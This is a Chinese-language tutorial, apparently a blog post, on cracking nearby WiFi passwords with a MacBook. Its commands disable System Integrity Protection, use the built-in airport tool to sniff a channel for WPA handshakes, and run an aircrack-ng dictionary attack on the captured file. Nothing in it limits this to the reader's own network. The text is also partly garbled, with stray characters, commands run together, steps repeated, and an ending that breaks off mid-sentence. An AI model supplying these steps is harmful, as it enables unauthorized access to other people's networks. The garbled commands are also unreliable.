使用MacBook自带工具抓包跑字典破解WiFi

首先需解除rootless内核保护(内核保护会对\usr、\sbin禁止root权限，下面 *** 作需用到\usr因此需解除rootless），解除方法为重启中按住Command + R键，出现实用工具界面，在菜单栏打开terminal；

解除内核保护，输入：csrutil disable

重启，输入：reboot

给airport指定路径：

sudo ln -s  /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/

Resources/airport  /usr/sbin/airport

2. 查看附近WiFi信息

在终端内输入如下命令，就能看到 airport 监测到的附近 wifi 信息：

airport -s

SSID 是 wifi名称，RSSI 是信号强度，CHANNEL 是信道。

3. 抓包

挑选一个信号强的信道进行监听抓包（比如信道1），在终端输入：

sudo airport en0 sniff  1

命令中的 en0 是自己电脑的网卡地址，有的电脑世烂可能是 en1，根据自己的实际情况进行输入，查看电脑网卡地址的地方如下：

ifconfig -a

大概等待2-5分钟就可以按 command + c 组合键退出查看含有抓包的cap文件了，文件所在地址是/tmp，可以使用Finder的前往文件夹功能进入：

可以将cap文件移到我们想保存的地方，也可以不移走（重启后就没有了）。

4.破解WiFi密码

先在桌面饥备建一个文件夹，取名「wifi」，将字典和cap文件都放到这个文件夹内（假设字典是01.txt，cap文件名是01.cap，在终端输入：

cd ~/Desktop/wifi

aircrack-ng -w 01.txt 01.cap

就可以看到cap文件内的抓包情况，Encryption中（0 handshake）是抓包失败，（1 handshake）则是抓包成功。如看到第11行抓包成功，则在「Index number of target network ?」这里输入11后敲回车：

如果cap文件内全是（0 handshake），就按 command + c 组合键退出。重新回到「sudo airport en0 sniff 1」这步进行监听抓包。抓包成功率受到 wifi 信号强弱、电脑与路由器距搜肢漏离远近、路由器是否正处在收发数据状态的影响。总之多试几次、监听时间适当延长些，可以大大提高成功率。

命令：brewinstallaircrack-ng

注意，如果没安装brew,访问： https://brew.sh ，首页上有安装brew的命令，我安装时（201706）命令如下：

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install )"

2、添加airport快链

命令：ln-s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

3、使用mac自带的airport选取mac地址

命令：airport-s

选择CHANNEL的数值，比如：11

4、监听选定的频道获取到握手的包

命令：airport en0 sniff 11

运行一段时间，就可以在/tmp收获以.cap结尾的分析包，结束之后会提示保存的.cap文件位置

注意：（1）尽可能不要运行太长时间，否则.cap文件会比较大；

（2）可以使用ctr+c结束运行(我刚开始就不知道